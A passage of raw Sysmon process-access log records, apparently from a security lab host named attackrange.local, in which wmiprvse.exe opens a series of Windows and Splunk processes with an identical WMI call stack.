Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027305Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027304Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027303Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027302Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027301Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027300Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027299Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027298Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027297Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027296Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027295Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027294Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027293Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027292Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027291Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027290Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027289Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027288Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027287Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027286Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 